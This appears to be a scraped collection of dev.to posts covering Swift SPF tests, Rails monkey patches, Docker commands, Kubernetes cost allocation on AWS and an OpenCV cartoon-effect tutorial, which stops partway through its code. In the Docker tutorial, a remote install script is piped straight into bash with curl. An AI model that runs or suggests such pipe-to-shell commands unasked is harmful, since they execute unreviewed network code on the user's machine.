Test Case '-[DeconSpfTests.SPFTests testMechanismInclude]' passed (0.082 seconds).
Test Case '-[DeconSpfTests.SPFTests testMechanismRedirect]' started.
Test Case '-[DeconSpfTests.SPFTests testMechanismRedirect]' passed (0.000 seconds).
Test Suite 'SPFTests' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.083) seconds
Test Suite 'DeconSpfPackageTests.xctest' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.083) seconds
Test Suite 'All tests' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.084) seconds
```
### Let's add a new test
We want to be able to get a string representation of the mechanism as it was originally seen.
If I had an initially mechanism of `ip4:x.x.x.x` which was stored as
- kind: MechanismKind.Ip4
- qualifier: Qualifier.None
- mechanism: "x.x.x.x"
I should be able to call `mech.asMechanism()` and get `ip4:x.x.x.x` in return.
So let's make a test for this. (Expect failure)
We update the `DeconSpfTests.swift` with the following.
```swift
func testAsMechanism() {
let Mech = Mechanism(k: MechanismKind.ip4, q: Qualifier.None, m: "192.168.1.0/24");
XCTAssertEqual(Mech.asMechanism(), "ip4:192.168.1.0/24");
}
static var allTests = [
("testMechanismRedirect", testMechanismRedirect),
("testMechanismInclude", testMechanismInclude),
("testAsMechanism", testAsMechanism),
]
```
We add this test to the `allTests` so that it will be run with the others.
**Xcode** also complains
`Value of type 'Mechanism' has no member 'asMechanism'`.
This is because I have not yet defined a member function named `asMechanism()` on the **Mechanism** struct.
The code for this project can now be found [here](https://github.com/Bas-Man/swift-decon-spf).
This is the [diff](https://github.com/Bas-Man/swift-decon-spf/compare/Initial...QualifierGet) between the initial commit and the current code.
## Closing
That's it for today. In the next article. I will look at returning values based on the `Qualifier` type. These will be needed to build the string for `asMechanism()`
| basman |
698,004 | TYPO3 Talk with Tim: Author Of TYPO3 Blogger | We have Tim Lochmüller with us this week for an interesting TYPO3 Talk! Tim Lochmüller is the author... | 0 | 2021-05-14T09:17:45 | https://dev.to/t3terminal/typo3-talk-with-tim-author-of-typo3-blogger-an1 | We have Tim Lochmüller with us this week for an interesting TYPO3 Talk! Tim Lochmüller is the author of TYPO3 Blogger and works for the TYPO3 agency HDNET and has been working with TYPO3 since 2004.
The TYPO3 Talk with Tim is interesting, so grab that cup of coffee to explore Tim's insights into his views, the history and potential of TYPO3 and the open-source community, and how we can build a better TYPO3 ecosystem together!
Interviewee :Tim Lochmüller
Company: HDNET GmbH & Co. KG
Designation: Author of TYPO3 Blogger
Topic: Together Building a Better TYPO3 Eco-system
Let's explore his journey with TYPO3 from then to now, and much more! https://t3terminal.com/blog/typo3-talk-with-tim-author-of-typo3-blogger/ | t3terminal | |
708,211 | Applying monkey patches in Rails | Monkey patching is one of Ruby's most powerful features. It allows programmers to add methods to core... | 0 | 2021-05-25T13:43:50 | https://dev.to/ayushn21/applying-monkey-patches-in-rails-1bj1 | ruby, rails | [Monkey patching](https://en.wikipedia.org/wiki/Monkey_patch) is one of Ruby's most powerful features. It allows programmers to add methods to core classes which can result in some very elegant APIs. However it's quite easy to shoot yourself in the foot if you don't know what you're doing.
[This post from Justin Weiss](https://www.justinweiss.com/articles/3-ways-to-monkey-patch-without-making-a-mess/) is a brilliant guide on how to monkey patch responsibly. However he doesn't describe how to actually include your monkey patches in a Rails app, so that's what I'm going to describe in this post.
Following Justin's advice, the implementation of all our monkey patches should go in the `lib/core_extensions` directory. So we might have some files like this:
`lib/core_extensions/array.rb`
```ruby
module CoreExtensions
module Array
def to_set
Set.new(self)
end
end
end
```
`lib/core_extensions/hash.rb`
```ruby
module CoreExtensions
module Hash
def keys_as_set
Set.new(keys)
end
end
end
```
The `lib/` directory in Rails is not autoloaded, so to apply these patches we need to run some code when our app boots. The best place to do this is to create a file called `monkey_patches.rb` under `config/initializers/`. All files in this directory are executed when Rails boots.
The contents of the file would look like:
```ruby
# Require all Ruby files in the core_extensions directory
Dir[Rails.root.join('lib', 'core_extensions', '*.rb')].each { |f| require f }
# Apply the monkey patches
Array.include CoreExtensions::Array
Hash.include CoreExtensions::Hash
```
This method works fine when we're patching Ruby's core classes, but if we want to patch classes in Rails frameworks such as `ActiveStorage` or `ActionText`, it's a bit more tricky as those classes may not be loaded as yet when the initializers are executed.
As you might expect from Rails, there's an elegant way to hook into the load process of those classes via `ActiveSupport`. So if we wanted to apply patches to `ActiveStorage::Attachment` and `ActionText::RichText`, we can include the following code in the `monkey_patches.rb`:
```ruby
ActiveSupport.on_load(:action_text_rich_text) do
ActionText::RichText.include CoreExtensions::ActionText::RichText
end
ActiveSupport.on_load(:active_storage_attachment) do
ActiveStorage::Attachment.include CoreExtensions::ActiveStorage::Attachment
end
```
The above code will apply our patches right after the relevant classes are loaded!
If you look at the [source code](https://github.com/rails/rails/blob/main/activestorage/app/models/active_storage/attachment.rb) for one of the above two classes, you'll see a line like this right at the bottom:
```ruby
ActiveSupport.run_load_hooks :active_storage_attachment, ActiveStorage::Attachment
```
This is where the name of the hook we pass into the `on_load` method when applying your patch is defined.
You can also run load hooks for your own app's classes in the same way to apply some configuration at boot time. A great example would be when using the adapter pattern to integrate with external services, but that's a topic for another blog post!
This post was originally published on [my blog](https://binarysolo.chapter24.blog/applying-monkey-patches-in-rails/). | ayushn21 |
698,154 | Boken Engine | Hi all, just joined the community. First time posting here, long time reading awesome published conte... | 0 | 2021-05-14T11:34:04 | https://dev.to/s3rrot/boken-engine-5ce1 | opensource, framework, swift, xcode | Hi all, just joined the community. First time posting here, long time reading awesome published content.

At my current job we have been working on a **Swift framework** for creating slides-based, non-linear visual stories and presentations.
Its name is **Boken Engine**, we got a beta version and it’s open source, so you can play with it and if you find any bugs you can leave a bug report and in case you know how to fix it we'd love to have new contributors. ;)
The idea is that any user, only with a few lines of codes, can generate **full fledged visual stories or slide based presentations for iOS devices**. It is based on SpriteKit and content is provided through JSON files (and additional image and sound assets to enrich your story).
You can visit the project on [GitHub](https://github.com/boken-engine/boken-engine)
Any feedback would be appreciate. Thanks in advance. | s3rrot |
699,857 | How to use Docker commands | In this post, we'll learn how to use Docker commands. We will make a web app inside a Docker... | 0 | 2021-05-16T14:22:11 | https://www.steadylearner.com/blog/how-to-use-docker-commands-42da | docker, tutorial, beginners, devops | <!--
Post{
subtitle: "Learn how to use Docker and upload its images to Docker Hub"
image: "posts/web/docker.png",
image_decription: "Image from the official website",
tags: "How use Docker code",
}
-->
<!-- Link -->
[Steadylearner]: https://www.steadylearner.com
[Docker Website]: https://docs.docker.com/get-started
[How to install Docker]: https://www.google.com/search?q=how+to+install+docker
[How to deploy a container with Docker]: https://thenewstack.io/how-to-deploy-a-container-with-docker/
[Docker Curriculum]: https://docker-curriculum.com/
[Docker Hub]: https://hub.docker.com/
[Docker lifecycle]: (https://medium.com/@BeNitinAgarwal/lifecycle-of-docker-container-d2da9f85959).
[AWS]: https://aws.amazon.com
[Elastic Beanstalk]: https://aws.amazon.com/pt/elasticbeanstalk/
[ECS]: https://aws.amazon.com/ecs/
[CloudFormation]: https://aws.amazon.com/pt/cloudformation/
[Yarn]: https://yarnpkg.com/lang/en/
[Express]: https://expressjs.com/
[comment]: # (Atualizei o link Docker lifecycle, como sugerido no relatório)
<!-- / -->
<!-- Steadylearner Post -->
[Steadylearner Blog]: https://www.steadylearner.com/blog
<!-- / -->
<!-- Steadylearner Twitter and LinkedIn -->
[Twitter]: https://twitter.com/steadylearner_p
[LinkedIn]: https://www.linkedin.com/in/steady-learner-3151b7164/
<!-- -->
In this post, we'll learn how to use Docker commands. We will make a web app inside a Docker container and turn it into a Docker image. We'll also learn how to upload it to [Docker Hub].
[You can find Portuguese version of this post here.](https://dev.to/steadylearner/como-usar-comandos-docker-1j76)
<br />
<h2 class="red-white">Prerequisite</h2>
1. [How to install Docker]
2. [Docker Website], [Docker Curriculum]
3. [How to deploy a container with Docker], [Docker lifecycle]
---
First, you must install Docker, if you don't have it yet. Type **$docker** on your machine and you will be shown how to proceed with the installation. Or just search how to install it on your browser.
This post is a summary of [Docker Website], [Docker Curriculum] etc. I hope you read them first, but you don't have to spend a lot of time with them. We'll learn how to deploy a web app and microservices to [AWS] with other [Steadylearner Blog] posts.
<br />
<h2 class="blue">Table of Contents</h2>
1. Confirm installation with Nginx
2. Set up your development environment with Docker
3. How to move your local files and folders to docker containers
4. How to use the web framework with docker containers
5. How to modify the network ports of docker images
6. Docker Images and Containers
7. How to upload your Docker images to Docker Hub
8. Conclusion
---
<br />
## 1. Confirm installation with Nginx
I hope you can install Docker. Before we learn how each Docker command works, let's test whether or not these can show some results on your machine.
Use them in your CLI.
```console
$docker search nginx
$docker pull nginx
$docker run --name nginx-webserver -p 80:80 nginx
```
Then, access [localhost](http://localhost.com). This will be shown in your browser:
```console
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.
For online documentation and support please refer to nginx.org.
Commercial support is available at nginx.com.
Thank you for using nginx.
```
Realize that you only need a few commands to use Docker. You could also start a Docker container with a specific name and execute bash comamnds with these.
```console
$docker run --name nginx-webserver -p 80:80 -d nginx
$docker exec -it CONTAINER_ID bash
```
<br />
## 2. Set up your development environment with Docker
In this section, we'll learn how to set up a default Docker image with Ubuntu. It will be possible to reuse this image later. If you use another OS, please, use that instead and refer to this part.
Start with **pull** commands to download the official ubuntu image from [Docker Hub]. If Docker Hub is something new for you, you can compare it to GitHub because of its repositories.
```console
$docker pull ubuntu
```
Now, make a container in your machine. To download minimal softwares, use sh or bash commands in it with this:
```console
$docker run -it ubuntu sh
```
Start by installing **CURL** to download other programs.
```console
$apt-get update
$apt-get install curl
$curl https://www.steadylearner.com
```
If you are out of the container, restart it with this:
```console
$docker exec -it CONTAINER_ID bash
```
You can find the CONTAINER_ID with **docker ps -a**. This is the command you will use often and it will show you some useful metadata of Docker containers.
We'll make a simple Node "Hello, World" web app example in this post. Let's start by configuring the Node development environment. Follow these steps if you want to use the same project as this post.
Also, you can use [$docker run -d steadylearner/ubuntu_node](https://cloud.docker.com/u/steadylearner/repository/docker/steadylearner/ubuntu_node) instead.
You should be inside your docker container to use them.
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Node, NPM, Yarn</summary>
```console
curl -sL https://deb.nodesource.com/setup_12.x | bash
```
This will be displayed:
```console
## Run `sudo apt-get install -y nodejs` to install Node.js 12.x and npm
## You may also need development tools to build native addons:
sudo apt-get install gcc g++ make
## To install the Yarn package manager, run:
curl -sL https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
sudo apt-get update && sudo apt-get install yarn
```
You should use commands without sudo.
```console
apt-get install gcc g++ make
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
apt-get update && apt-get install yarn
```
Follow those commmands and install them all.
Test Node work with this:
```console
$node
$console.log("Hello from www.steadylearner.com");
```
</details>
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Vim</summary>
Use this command with --assume-yes or -y to skip relevant install questions.
```console
apt install --assume-yes vim
```
Vim text editor will be installed. Now, use this command to use it:
```console
$vim hello.js
```
Edit your hello.js file with this and **:wq** to save and quit from the Vim.
```js
// hello.js
console.log("Hello from www.steadylearner.com");
```
Use this command to verify that Node is installed correctly:
```console
$node hello.js
// Hello from www.steadylearner.com
```
</details>
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Git</summary>
```console
$apt-get --assume-yes git-core
```
This will install Git and verify that it is installed and its version:
```console
$git --version
```
Then, get your GitHub username and email from your local machine:
```console
$git config --get user.name
$git config --get user.email
```
Use them in the Docker container to operate Git inside:
```console
$git config --global user.name yourname
$git config --global user.name youremail
```
Make use of the same command (--get) before checking them in your Docker container.
Test Git clone work to download files from your previous GitHub repositories. For example, clone [steadylearner/docker-examples](http://github.com/steadylearner/docker-examples) repository with this:
[comment]: # (Apenas adicionei um link para o repositório)
```console
$git clone https://github.com/steadylearner/docker-examples.git
```
</details>
I hope you can install everything you think is necessary in your Docker container.
You can skip this Yarn relevant part and use default npm commands instead. Otherwise, read [this post](https://linuxize.com/post/how-to-install-yarn-on-ubuntu-18-04/) for more information.
Verify the [Yarn] version first in it.
```console
$yarn -v
```
It will show the version of your Yarn.
Next, use these commands to use Node project:
```console
$cd /home
$mkdir node && cd node
$yarn init
$yarn add chalk
```
Test NPM or Yarn work with NPM modules with these:
```js
// Start with $node in your console and use each command.
const chalk = require("chalk");
const blue = chalk.blue;
const hello = blue("Hello from www.steadylearner.com");
console.log(hello);
```
It should have shown **Hello from www.steadylearner.com** message in your console.
We verified that NPM packages work in your docker container with this.
[comment]: # (Há algo faltando aqui?)
If you want, make alias for this directory also similar to this.
```console
$vim ~/.bashrc
```
Type this and :wq to save and quit.
```bash
alias work="cd /home/node"
```
Use **$source ~/.bashrc** and you can use your node project with **$work** whenever you want. Also, you can define WORKDIR later with **Dockerfile** or **docker-compsose.yml** for the same purpose.
There will be many Docker containers in your machine. Use these commands to remove unnecessary ones:
**1.** List and remove previous Docker containers.
```console
$docker ps -a
```
The list of instances that you ran before will be shown.
**2.** Remove what you don't need.
```console
$docker stop containerid
$docker rm containerid
```
or
```console
$docker rm containerid -f
```
<br />
## 3. How to move your local files and folders to docker containers
We can use Git commands to download files from the GitHub into your containers. Moreover, you can use Docker commands to move local files and folders to your Docker containers and vice versa.
Refer to these examples or **docker cp --help**.
**1.** Files
```console
$docker cp from_localhost.txt containerid:/from_localhost.txt
$docker cp containerid:/from_docker from_docker.txt
```
**2.** Folders
```console
$docker cp from_localhost containerid:/from_localhost
$docker cp containerid:/from_localhost from_localhost
```
<br />
## 4. How to use web frameworks with docker containers
We installed Node relevant softwares for this part. If you use web frameworks from other languages, please, refer only to the workflow of this section.
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Express</summary>
Install the dependencies we'll use inside the docker container with this:
```console
$yarn add express chalk
```
Next, we'll build "Hello, World!" app with the JavaScript code below.
```js
// server.js
const express = require('express')
const chalk = require("chalk");
const app = express()
const port = 3000
app.get('/', (req, res) => res.send('Hello, World!'))
const blue = chalk.blue
const target = blue(`http://localhost:${port}`)
app.listen(port, () => console.log(`Express Server ready at ${target}`))
```
Then, **$node server.js** will display this message:
```console
[Express] Server ready at http://localhost:3000
```
But **$curl http://localhost:3000** or visiting it in your browser won't work yet.
Each container has its own IP to network. We should inspect the docker container with **$docker inspect CONTAINER_ID > inspect.txt** to extract the information from it.
You can find its local IP at the end of inspect.txt and it will be similar to **172.17.0.2**. Save your time doing getIP.js and **$node getIP.js**.
```js
const fs = require('fs')
const filename = "inspect.txt";
fs.readFile(filename, 'utf8', function(err, data) {
if (err) throw err;
// console.log(`Read ${filename}`);
const dataObject = JSON.parse(data);
// console.log(payload);
// console.log(typeof payload);
const ip = dataObject[0].NetworkSettings.IPAddress;
console.log(`IP is ${ip}`);
});
```
You can use the [docker inspect command](https://docs.docker.com/engine/reference/commandline/inspect/) as well.
Test the IP with $curl http://172.17.0.2:3000/ or verify it with your browser.
If you can see this message, realize that you can actually develop web apps on your local machine with Docker.
```console
Hello, World!
```
</details>
<br />
## 5. How to modify the network ports of docker images
In the previous part, we had to find the network port for the web framework to visit it. Alternatively, [you can start with your custom port](https://www.google.com/search?&q=how+to+assign+port+for+docker+container).
```console
$docker run -it --name ubuntu_node -p 80:80 ubuntu
```
You can also use it with **-d** to [make the container run in background.](https://docs.docker.com/engine/reference/run/).
```console
docker run -d --name ubuntu_node -p 80:80 ubuntu:latest
```
Refer to this to find out what happens here better.
'By default, the port on the host (container) is mapped to 0.0.0.0, which means all IP addresses. You can specify a particular IP when defining the port mapping, for example, -p 127.0.0.1:80:80'
<br />
## 6. Docker Images and Containers
You may find yourself confused by the difference between Docker container and image. Just think of the images as classes and containers as instances that you are using on your machine. You can:
1. Pull or run (pull and start) images and it will make docker containers from them on your local machine.
2. Edit files in your containers with **$docker exec -it containername bash**.
3. Make images from the containers with **$docker commit containername YourDockerHub/image && docker push account/image**.
Feel free to start with Dockerfile instead of **1.** and **2.** and commit your docker images as well. We'll learn that in another [Steadylearner Blog] with [Elastic Beanstalk].
<br />
## 7. How to upload your Docker images to Docker Hub
Now, we are going to learn how to [create a repository first at Docker Hub](https://cloud.docker.com/repository/create) with the example we made.
First, login with this command:
```console
$docker login
```
Then, use [$docker commit](https://www.scalyr.com/blog/create-docker-image).
```console
$docker commit ubuntu_node
```
Next, verify the image made from the ubuntu_node container using this:
```console
$docker images
```
Give it a tag (name).
```console
$docker tag imageid steadylearner/ubuntu_node
```
You can execute this command instead:
```console
$docker commit ubuntu_node steadylearner/ubuntu_node
```
Now, you can push your docker image to Docker Hub with this:
```console
$docker push steadylearner/ubuntu_node // yourusername/image
```
Wait for uploading process to complete and use this:
```console
$docker run -it steadylearner/ubuntu_node bash
```
If you want to edit it, just follow the same steps we used before.
Restart the containers with this, if they stop:
```console
$docker restart containerid
$docker exec -it containerid bash
```
To remove container made from steadylearner/ubuntu_node image or yours, you can use this:
```console
$docker stop ubuntu_node
$docker container rm ubuntu_node
$docker image rm ubuntu
```
If you want to rename the container, use this:
```console
$docker container rename randomname ubuntu_node
```
Use yours instead of ubuntu_node or steadylearner/ubuntu_node.
If you modify the project, use the commands similar to this:
```console
$docker commit ubuntu_node steadylearner/ubuntu_node
```
Or with a commit message.
```console
$docker commit --message "Test message and will be similar to github -m option" ubuntu_node steadylearner/ubuntu_node
```
Now, let's push the image made from it to Docker Hub:
```console
$docker push steadylearner/ubuntu_node
```
and use this:
```console
$docker run -it steadylearner/ubuntu_node bash
```
or this, to verify the result:
```console
$docker history steadylearner/ubuntu_node
```
<br />
## 8. Conclusion
I hope you made it all work. We learned how to install Docker and make it work with Nginx, how to make a Docker container and image and upload them into [Docker Hub].
There are many things to learn. But everything will be easier with examples. In the later posts on the [Steadylearner Blog], we will learn how to deploy the web app with [Elastic Beanstalk] from [AWS] and Dockerfile. We will also learn how to deploy micro services with [ECS], [CloudFormation], **docker-compose.yml** etc. So, keep an eye out for updates!
Stay on top of the latest Steadylearner content: follow me on [Twitter].
[If you need to hire a developer, you can contact me.](https://t.me/steadylearner)
**Thank you! Share this post with others and help us to grow and improve.**
Reviewed by [Mariana Santos](https://www.linkedin.com/in/mariana-santos-89234a189/?locale=en_US)
[comment]: # (Tudo bem me identificar aqui certo? :)
Refer to these commands if you want more. Use the ID or the name of the containers for them.
### Logs of the container
```console
$docker logs containerid | name
```
### History of the image
```console
#docker history steadylearner/ubuntu_node
```
### Remove unused images
```console
$docker images
$docker image rm dockerimagename or docker rmi
```
### Rename the container
```console
$docker rename randomname whatyouwant
```
### Pause and unpause the containers
```console
$docker pause containerid | name
$docker ps -a
$docker unpuase containerid | name
$docker ps -a
```
### Start and stop them
```console
$docker stop containerid | name
$docker ps -a
$docker start containerid | name
$docker ps -a
```
### Remove containers
```console
$docker container rm containerid | name
```
| steadylearner |
701,814 | Keep your AWS Kubernetes costs in check with intelligent allocation | Traditional cost allocation and Kubernetes are like oil and water. Surely, containerized environments... | 0 | 2021-05-18T14:25:24 | https://cast.ai/blog/keep-your-aws-kubernetes-costs-in-check-with-intelligent-allocation/ | kubernetes, devops, aws, eks | Traditional cost allocation and Kubernetes are like oil and water. Surely, containerized environments make a lot of things easier. But not this one.
Luckily, there are a few things you can do to **allocate AWS Kubernetes costs smarter** and keep them in check.
Read on to find out what they are and finally hold the reins over your cloud expenses.
**What you’ll find inside:**
* **You’re not the only one getting confused by Kubernetes costs, here’s why**
1. Calculating shared costs is a nightmare
2. Containers are very dynamic
3. Dealing with multiple cost centers is hard
4. Autoscaling leads to more confusion
* **Allocating AWS Kubernetes costs, the smart way**
1. Use container classes
2. Break costs down for labeling and tagging
3. Establish labeling and namespace standards
4. Split and allocate shared costs
5. Count in cluster costs beyond the core
* **How to apply all of this and win the cost allocation game**
## You’re not the only one getting confused by Kubernetes costs, here’s why

Getting the hang of [Kubernetes cost estimation](https://cast.ai/blog/kubernetes-cost-estimation-4-problems-and-how-to-solve-them/), allocation, and reporting is something every team mindful of its expenses aspires to.
But why is it so hard? Here are 4 Kubernetes cost challenges we all know all too well.
### 1. Calculating shared costs is a nightmare
Kubernetes clusters are in essence shared services multiple teams run to hold multiple containers and apps. Once a team deploys a container, it uses some of the cluster’s resources – so, you need to pay for each and every server instance that is part of your cluster.
> This doesn’t sound so hard until you try making that work with, say, three teams working on ten unique applications.
Which application or project uses the biggest chunk of your cluster resources? You can’t really tell, because all of these projects use multiple containers.
Knowing how many resources an individual container uses from a specific server is next to impossible. And that’s what makes allocating Kubernetes costs so challenging.
### 2. Containers are very dynamic
A container’s lifespan lasts only [one day](https://www.datadoghq.com/container-report/). Compare that to how long your virtual machine lasts. It’s a speck in time.
The dynamic character of your containerized environment makes calculating costs even more complex. You need to come up with a cost management system that can handle it.
### 3. Dealing with multiple cost centers is hard
It’s likely that not all development costs come from the DevOps budget and you have a number of cost centers running across your company.
While your product team develops core applications, **another team might launch a shadow IT project that consumes resources.** You need to consider this especially if your business has multiple digital services and each comes with its own teams and budgets.
When multiple teams use one cluster, identifying which one is responsible for which part of the bill is a hard nut to crack.
### 4. Autoscaling leads to more confusion
Teams often use the three built-in [Kubernetes autoscaling](https://cast.ai/blog/guide-to-kubernetes-autoscaling-for-cloud-cost-optimization/) mechanisms that reduce the waste (and cost) of running clusters. But autoscaling has an impact on your cost calculations.
For example, **Vertical Pod Autoscaler (VPA)** automatically adjusts requests and limits configuration to eliminate overhead. It changes the number of requests on a container, increasing and reducing its resource allocation.
**Horizontal Pod Autoscaler (HPA)** focuses on scaling out to get the best combo of CPU or RAM allocated to an instance. It changes the number of containers all the time.
#### Why does it matter? Here’s an example scenario:
* Imagine that you have three webserver containers running during the night. Everything works well.
* But there are some peak hours during the day – so HPA scales from 3 to 50 containers.
* When lunchtime comes and demand is lower, it scales down.
* And then it brings the scale back up for the afternoon rush, only to settle at a low level as the day ends.
The number of containers and their sizes is very dynamic in this setup. This complicates the process of calculating and forecasting AWS Kubernetes costs even more.
## Allocating AWS Kubernetes costs, the smart way

Take a look at your [cloud bill](https://cast.ai/blog/cloud-bill-5-common-issues-and-how-to-deal-with-them/). You get charged for every instance that makes up a cluster where containers are deployed. You need to pay for that resource, even if you’re not using it.
> To allocate the individual costs of a container running on a given cluster, you need to discover how much of the server the container ended up consuming.
And then add the satellite AWS Kubernetes costs of a running cluster to that as well (from management nodes and software licensing to backups and disaster recovery).
How to do it? Here are some best practices for allocating Kubernetes costs.
### 1. Use container classes
You can set different resource guarantees on scheduled containers in Kubernetes. They’re called Quality of Service (QoS) classes. Here’s a quick introduction:
**Guaranteed**
These pods are top priority and guaranteed to not get killed until the moment they exceed their limits. If limits and requests (not equal to 0) are set for all the resources across your containers and are equal, the pod is classified as guaranteed.
Use this for critical service containers to make sure that a pod gets the vCPU and memory it needs at all times.
**Burstable**
If your workload experiences spikes, it should have access to more resources when it needs them. This setup allows the pod to use more resources than requested at first – as long as the capacity is available on the underlying instance.
This type of allocation works like burstable instances AWS offers (T-series) – they give you a base level of performance and allow the pod to burst when it requires more.
This is much more cost-effective than investing in an instance large enough to cover the spikes but way too large for regular operation.
**BestEffort**
These pods are the lowest priority and get killed first if your system runs out of memory. This allocation allows the pod to run while there’s excess capacity available and stops it when it’s not. It works like spot instances in AWS.
> It’s a good idea to allocate a mix of pods that have different resource allocation guarantees into a server instance to increase its utilization.
For example, you can allocate a baseline of resources to guaranteed resource pods, add some burstable pods that use up to the remainder of resources, and best-effort pods that take advantage of any spare capacity.

### 2. Break costs down for labeling and tagging
Breaking costs into separate categories helps to make sense of them through labels and tagging. Here are a few categories that Kubernetes teams find useful:
* **Billing hierarchy** – develop and align it with your cloud costs (for example, projects, folders, or organizations),
* **Resources** – this part covers compute cores, GPU, TPU, RAM, load balancers, custom machines, network egress, etc.
* **Namespaces** – it’s a good practice to label specific and isolated containers,
* **Labels** – come up with labels reflecting different cost centers, teams, application names, environments, etc.
### 3. Establish labeling and namespace standards
Develop and implement a labeling and namespace strategy – and stick to it when allocating cluster costs. That way, teams that use AWS can see which groups are driving costs in a given cluster.
Consider the proportional resources consumed by every group and use your findings to allocate cluster costs to these groups.
**Here’s an example:**
Let’s say that you have four namespaces in a cluster. Each of them consumes 25% of the cluster resources. One way to allocate costs would be taking 25% of the total cluster costs and allocating them to each namespace.
Naturally, this is an example scenario – don’t expect things to be so straightforward in the real world.
> Before setting out to do that, establish how you’ll be determining cluster resource utilization – by CPU, memory, or a combination of these two? Are you going to look at requests or actual consumption?
* **If you go for actual usage,** each team will only pay for what it uses. But who will be covering the bill for idle time? How are you going to deal with overprovisioning?
* **If you allocate costs by resource requests,** you’ll encourage teams to provision only what they need and allocate all the costs. But this might also lead teams to underestimate their requirements.
### 4. Split and allocate shared costs
Companies have unique ways to split infrastructure costs. These methods often get inherited when they start using Kubernetes.
Here’s a set of best practices if you’re looking for another approach:
#### a. Define what shared costs are
This depends on the maturity and size of your company. You share the cloud bill at the organizational level but need to allocate it either to a centralized budget or different cost centers. Still, your shared costs will be charged within one account, so understanding which AWS Kubernetes costs should be shared is challenging.
**Here are a few examples of commonly shared costs:**
* Shared resources (network, storage like data lakes)
* Platform services (Kubernetes, logging)
* Enterprise-level support and discounts
* Licensing and third-party costs
> Take support charges as an example. They’re applied at the parent account level. While some businesses cover them with a central budget of the IT or cloud team, others go a step further and allocate this cost to customers like application owners or business units.
The rise of shared platforms where multiple teams use the same core resources complicates this – like Kubernetes systems that run on shared clusters.
#### b. Split your shared costs
Tagging helps to do that accurately, and you can choose from several techniques:
* Proportional split – based on the relative percentage of direct costs
* Even split – where you split the total amount evenly across all targets
* Fixed proportion split – based on a user-defined coefficient
This is a bit abstract, so let’s show an example.
Imagine that you have several business units that consume a different portion of cloud resources:

#### You get a $15k enterprise support charge on top of that, so your final bill is $115k per month.
Here’s how this plays out in different splitting techniques.
#### Proportional split
In this model, you split the $15k enterprise support charge among your three business units based on the percentage of their spend in direct charges. So, the sales operations team that uses 50% of your bill will also be accountable for $7.5k on top of their bill.

#### Even split
This model is simpler, so you can often find it among smaller companies with fewer business units. In this scenario, the $15k enterprise support charge is shared evenly by all business units – so $5k each.

#### Fixed proportion split
When using this method, you set a fixed percentage for attributing shared costs based on past spend. The idea is to get a fair breakdown. So if you decide that the sales operations team’s shared cost allocation is 40%, then it will get $6k of the enterprise support fee allocated to it.

### 5. Count in cluster costs beyond the core

When allocating costs to cluster consumers, consider the satellite costs of operating this cluster like:
* **Management and operational costs** – these are charged by AWS for managing the cluster for you. For example, EKS charges $0.1 per hour per Kubernetes cluster – this amounts to c. $74 per month.
**_Learn more here: [AWS EKS vs. ECS vs. Fargate: Where to manage your Kubernetes?](https://cast.ai/blog/aws-eks-vs-ecs-vs-fargate-where-to-manage-your-kubernetes/)_**
* **Storage** – add the costs of storage consumed by the host OS on the nodes, and any backup or data retrieval storage that is used in operating a production cluster can be allocated back to the workloads running on the cluster.
* **Licensing** – these costs might be included in your AWS bill, but if you use Bring Your Own License (BOYL), you need to allocate this cost from the external spend. Moreover, software packages running on the host OS might incur a license fee too.
* **Observability** – these metrics and logs are transferred from the cluster to a service your teams use to monitor and visualize them. This cost might be incurred by AWS or a third-party SaaS solution.
* **Security** – AWS offers a wealth of security features, but they come at an extra fee that needs to be allocated.
## How to apply all of this and win the cost allocation game
Implementing all of these best practices at once is bound to overwhelm you. So start small and develop a process for allocating costs. Build an understanding of how these costs should be allocated in your company.
Or get a solution that keeps your AWS Kubernetes costs at bay. Analyzing and allocating costs is so much easier if you have access to a detailed overview like this:

**Here’s how to get started:** [Analyze your cluster for free](https://cast.ai/eks-optimizer/) to see every single detail that increases your AWS bill. | castai |
705,510 | How to cartoonize an image with Python | In this tutorial, I will show you how to give a cartoon-effect to an image in Python with OpenCV. Op... | 0 | 2021-05-22T08:43:08 | https://dev.to/stokry/how-to-cartoonize-an-image-with-python-1e01 | python, tutorial, showdev, computervision | In this tutorial, I will show you how to give a cartoon-effect to an image in Python with OpenCV.
OpenCV is an open-source python library used for computer vision and machine learning. It is mainly aimed at real-time computer vision and image processing. It is used to perform different operations on images which transform them using different techniques.
Many apps can turn your photos into cartoons, but you can do this on your own with few lines of code Python code.
This is our test image:

Let's jump to the code.
```python
import numpy as np
import cv2
```
after that we we read our image:
```python
filename = 'elon.jpeg'
```
then we will define our `resizeImage` :
```python
def resizeImage(image):
scale_ratio = 0.3
width = int(image.shape[1] * scale_ratio)
height = int(image.shape[0] * scale_ratio)
new_dimensions = (width, height)
resized = cv2.resize(image, new_dimensions, interpolation = cv2.INTER_AREA)
return resized
```
the we need to find contours:
```python
def findCountours(image):
contoured_image = image
gray = cv2.cvtColor(contoured_image, cv2.COLOR_BGR2GRAY)
edged = cv2.Canny(gray, 30, 100)
contours, hierarchy = cv2.findContours(edged,
cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(contoured_image, contours, contourIdx=-1, color=1, thickness=1)
cv2.imshow('Image after countouring', contoured_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
return contoured_image
```
after that, we do a color quantization:
```python
def ColorQuantization(image, K=4):
Z = image.reshape((-1, 3))
```
then we convert image to numpy float32:
```python
Z = np.float32(Z)
```
also we need to define critera and apply kmeans:
```python
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10000, 0.0001)
compactness, label, center = cv2.kmeans(Z, K, None, criteria, 1, cv2.KMEANS_RANDOM_CENTERS)
```
then we convert to `uint8` and apply to original image:
```python
